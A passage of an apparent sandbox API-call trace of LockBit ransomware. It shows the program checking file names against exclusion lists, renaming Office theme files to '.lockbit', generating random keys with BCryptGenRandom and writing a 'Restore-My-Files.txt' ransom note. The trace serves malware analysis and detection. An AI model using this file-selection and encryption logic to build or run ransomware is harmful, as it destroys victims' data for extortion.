ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1583a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Module.thmx", cAlternateFileName="MODULE~1.THM")) returned 1 [0190.264] lstrcmpiW (lpString1=".", lpString2="Module.thmx") returned -1 [0190.264] lstrcmpiW (lpString1="..", lpString2="Module.thmx") returned -1 [0190.264] PathFindExtensionW (pszPath="Module.thmx") returned=".thmx" [0190.265] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.265] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.266] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.266] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Module.thmx") returned 1 [0190.267] lstrcmpiW (lpString1="ntldr", lpString2="Module.thmx") returned 1 [0190.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Module.thmx") returned 1 [0190.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="Module.thmx") returned -1 [0190.267] lstrcmpiW (lpString1="autorun.inf", lpString2="Module.thmx") returned -1 [0190.267] lstrcmpiW (lpString1="thumbs.db", lpString2="Module.thmx") returned 1 [0190.267] lstrcmpiW (lpString1="iconcache.db", lpString2="Module.thmx") returned -1 [0190.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx") returned=".thmx" [0190.267] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.267] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.267] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.268] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.269] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.269] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.269] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.269] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx.lockbit") returned 73 [0190.269] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\module.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0190.277] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.277] malloc (_Size=0x40068) returned 0x3df0008 [0190.277] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=88122) returned 1 [0190.277] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.278] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.278] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.278] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.278] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.281] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.281] malloc (_Size=0xa8) returned 0x1fa2ed8 [0190.281] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0190.282] free (_Block=0x1fa2ed8) [0190.282] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Module.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.282] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.282] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.282] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e64dd00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ba4760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7e64dd00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x96ac7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Newsprint.thmx", cAlternateFileName="NEWSPR~1.THM")) returned 1 [0190.283] lstrcmpiW (lpString1=".", lpString2="Newsprint.thmx") returned -1 [0190.283] lstrcmpiW (lpString1="..", lpString2="Newsprint.thmx") returned -1 [0190.283] PathFindExtensionW (pszPath="Newsprint.thmx") returned=".thmx" [0190.283] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.283] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.284] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.284] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Newsprint.thmx") returned 1 [0190.285] lstrcmpiW (lpString1="ntldr", lpString2="Newsprint.thmx") returned 1 [0190.285] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Newsprint.thmx") returned 1 [0190.285] lstrcmpiW (lpString1="bootsect.bak", lpString2="Newsprint.thmx") returned -1 [0190.285] lstrcmpiW (lpString1="autorun.inf", lpString2="Newsprint.thmx") returned -1 [0190.285] lstrcmpiW (lpString1="thumbs.db", lpString2="Newsprint.thmx") returned 1 [0190.285] lstrcmpiW (lpString1="iconcache.db", lpString2="Newsprint.thmx") returned -1 [0190.285] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.285] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx") returned=".thmx" [0190.285] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.285] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.285] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.286] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.286] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx.lockbit") returned 76 [0190.286] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\newsprint.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0190.295] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.295] malloc (_Size=0x40068) returned 0x3df0008 [0190.295] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=617159) returned 1 [0190.295] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.296] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.296] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.296] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.297] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.298] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.299] malloc (_Size=0xae) returned 0x1fa2ed8 [0190.299] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0190.300] free (_Block=0x1fa2ed8) [0190.300] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Newsprint.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.300] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.300] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.300] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f06cd00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5ba4760, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x1f06cd00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x132b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Opulent.thmx", cAlternateFileName="OPULEN~1.THM")) returned 1 [0190.300] lstrcmpiW (lpString1=".", lpString2="Opulent.thmx") returned -1 [0190.300] lstrcmpiW (lpString1="..", lpString2="Opulent.thmx") returned -1 [0190.300] PathFindExtensionW (pszPath="Opulent.thmx") returned=".thmx" [0190.300] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.300] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.301] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.302] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.302] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.303] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Opulent.thmx") returned 1 [0190.303] lstrcmpiW (lpString1="ntldr", lpString2="Opulent.thmx") returned -1 [0190.304] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Opulent.thmx") returned -1 [0190.304] lstrcmpiW (lpString1="bootsect.bak", lpString2="Opulent.thmx") returned -1 [0190.304] lstrcmpiW (lpString1="autorun.inf", lpString2="Opulent.thmx") returned -1 [0190.304] lstrcmpiW (lpString1="thumbs.db", lpString2="Opulent.thmx") returned 1 [0190.304] lstrcmpiW (lpString1="iconcache.db", lpString2="Opulent.thmx") returned -1 [0190.304] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.304] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx") returned=".thmx" [0190.304] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.304] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.304] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.304] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.304] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.304] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.304] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.304] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.304] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.305] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.305] wsprintfW (in: param_1=0x3d6beb8, 